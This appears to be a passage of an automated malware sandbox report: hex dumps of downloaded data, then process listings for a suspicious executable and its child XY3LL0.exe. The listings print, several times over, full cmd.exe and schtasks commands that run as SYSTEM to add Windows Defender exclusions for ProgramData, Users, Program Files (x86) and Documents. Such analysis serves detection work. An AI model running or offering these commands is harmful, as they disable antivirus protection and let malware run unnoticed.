                                                                                          2025-01-11 03:44:26 UTC4096INData Raw: e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c a4
                                                                                          Data Ascii: ^h0X<LU)dF]:ywSDJu*7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD|T#c-Cpk*^0ncLhz43h\`/k?_wE\
                                                                                          2025-01-11 03:44:26 UTC4096INData Raw: 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9 d5
                                                                                          Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
                                                                                          2025-01-11 03:44:26 UTC4096INData Raw: 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7 28
                                                                                          Data Ascii: M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ|fan?adq~|(
                                                                                          2025-01-11 03:44:26 UTC4096INData Raw: 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66 ab
                                                                                          Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
                                                                                          2025-01-11 03:44:26 UTC4096INData Raw: 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca 6b
                                                                                          Data Ascii: 07,7OL|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/k
                                                                                          2025-01-11 03:44:26 UTC4096INData Raw: 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06 44
                                                                                          Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*D
                                                                                          2025-01-11 03:44:26 UTC4096INData Raw: d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a e8
                                                                                          Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ


                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:22:42:59
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\2976587-987347589.08.exe"
                                                                                          Imagebase:0x140000000
                                                                                          File size:30'887'936 bytes
                                                                                          MD5 hash:3F0D4AC83E0BEC29AEBC666FF027A5D6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:7
                                                                                          Start time:22:44:02
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Users\user\Documents\XY3LL0.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Users\user\Documents\XY3LL0.exe
                                                                                          Imagebase:0x140000000
                                                                                          File size:133'136 bytes
                                                                                          MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 0%, ReversingLabs
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:8
                                                                                          Start time:22:44:04
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Users\user\Documents\XY3LL0.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Users\user\Documents\XY3LL0.exe
                                                                                          Imagebase:0x140000000
                                                                                          File size:133'136 bytes
                                                                                          MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:9
                                                                                          Start time:22:44:15
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                          Imagebase:0x7ff7f5dd0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:10
                                                                                          Start time:22:44:15
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:11
                                                                                          Start time:22:44:15
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                                                          Imagebase:0x7ff7e8a80000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:12
                                                                                          Start time:22:44:15
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:SCHTASKS /Run /TN "Task1"
                                                                                          Imagebase:0x7ff7e8a80000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:13
                                                                                          Start time:22:44:15
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                                          Imagebase:0x7ff7f5dd0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:14
                                                                                          Start time:22:44:15
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:15
                                                                                          Start time:22:44:15
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                          Imagebase:0x7ff7e8a80000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:16
                                                                                          Start time:22:44:15
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\reg.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                                          Imagebase:0x7ff713fd0000
                                                                                          File size:77'312 bytes
                                                                                          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:17
                                                                                          Start time:22:44:16
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                          Imagebase:0x7ff7f5dd0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:18
                                                                                          Start time:22:44:16
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:19
                                                                                          Start time:22:44:16
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                                                          Imagebase:0x7ff7e8a80000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:20
                                                                                          Start time:22:44:16
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:SCHTASKS /Run /TN "Task1"
                                                                                          Imagebase:0x7ff7e8a80000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:21
                                                                                          Start time:22:44:16
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                                          Imagebase:0x7ff7f5dd0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:22
                                                                                          Start time:22:44:16
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:23
                                                                                          Start time:22:44:16
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                          Imagebase:0x7ff7e8a80000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:24
                                                                                          Start time:22:44:16
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\reg.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                                          Imagebase:0x7ff713fd0000
                                                                                          File size:77'312 bytes
                                                                                          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:25
                                                                                          Start time:22:44:17
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                          Imagebase:0x7ff7f5dd0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:26
                                                                                          Start time:22:44:17
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:27
                                                                                          Start time:22:44:17
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                                                          Imagebase:0x7ff7e8a80000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:28
                                                                                          Start time:22:44:17
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:SCHTASKS /Run /TN "Task1"
                                                                                          Imagebase:0x7ff7e8a80000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:29
                                                                                          Start time:22:44:17
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                                          Imagebase:0x7ff7f5dd0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:30
                                                                                          Start time:22:44:17
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                          Imagebase:0x7ff7e8a80000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:31
                                                                                          Start time:22:44:17
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:32
                                                                                          Start time:22:44:17
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\reg.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                                          Imagebase:0x7ff713fd0000
                                                                                          File size:77'312 bytes
                                                                                          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:33
                                                                                          Start time:22:44:18
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                          Imagebase:0x7ff7f5dd0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:34
                                                                                          Start time:22:44:18
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:35
                                                                                          Start time:22:44:18
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
